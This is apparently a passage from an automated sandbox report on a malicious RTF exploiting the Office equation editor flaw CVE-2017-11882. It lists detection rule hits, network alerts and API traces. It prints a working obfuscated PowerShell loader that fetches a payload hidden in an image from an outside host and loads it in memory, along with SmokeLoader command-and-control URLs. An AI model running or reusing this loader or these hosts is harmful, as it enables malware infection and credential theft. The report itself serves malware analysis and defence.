? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3312, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 3472, ProcessName: wscript.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3516, TargetFilename: C:\Users\user\AppData\Local\Temp\zoonpc2e.0er.ps1

            Data Obfuscation

            barindex
            Sigma detected: Powershell download and load assembly
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8

            Suricata Signatures

            Timestamp:2024-08-31T19:25:33.084582+0200
            SID:2039103
            Severity:1
            Source Port:49166
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T19:26:53.834308+0200
            SID:2039103
            Severity:1
            Source Port:49168
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T19:25:41.127631+0200
            SID:2039103
            Severity:1
            Source Port:49167
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T19:25:33.477519+0200
            SID:2829848
            Severity:2
            Source Port:80
            Destination Port:49166
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-31T19:25:08.839977+0200
            SID:2049038
            Severity:1
            Source Port:443
            Destination Port:49164
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfAvira: detected
            Antivirus detection for URL or domain
            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgURL Reputation: Label: malware
            Source: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFAvira URL Cloud: Label: malware
            Source: http://prolinice.ga/index.phpAvira URL Cloud: Label: malware
            Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
            Multi AV Scanner detection for domain / URL
            Source: prolinice.gaVirustotal: Detection: 15%Perma Link
            Source: http://prolinice.ga/Virustotal: Detection: 15%Perma Link
            Source: http://prolinice.ga/index.phpVirustotal: Detection: 18%Perma Link
            Source: http://vilendar.ga/index.phpVirustotal: Detection: 16%Perma Link
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfVirustotal: Detection: 50%Perma Link
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfReversingLabs: Detection: 50%
            Source: C:\Windows\explorer.exeCode function: 12_2_02805174 CryptAcquireContextA,12_2_02805174
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,19_2_000C3098
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,19_2_000C3717
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3E04 RtlCompareMemory,CryptUnprotectData,19_2_000C3E04
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1198 CryptBinaryToStringA,CryptBinaryToStringA,19_2_000C1198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,19_2_000C11E1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,19_2_000C123B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1FCE CryptUnprotectData,RtlMoveMemory,19_2_000C1FCE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,21_2_000826AC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0008178C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0008118D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_000C2404
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_000C245E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_000C263E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00082799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,26_2_00082799
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_000825A4 CryptBinaryToStringA,CryptBinaryToStringA,26_2_000825A4

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.94.148.16 Port: 80Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
